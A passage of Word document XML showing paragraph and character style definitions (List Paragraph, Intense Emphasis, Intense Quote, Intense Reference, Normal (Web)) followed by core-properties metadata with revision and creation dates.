    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00006D15"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00006D15"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00006D15"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00006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D15"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00006D15"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008347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6</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3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-27T00:41:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-27T08:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>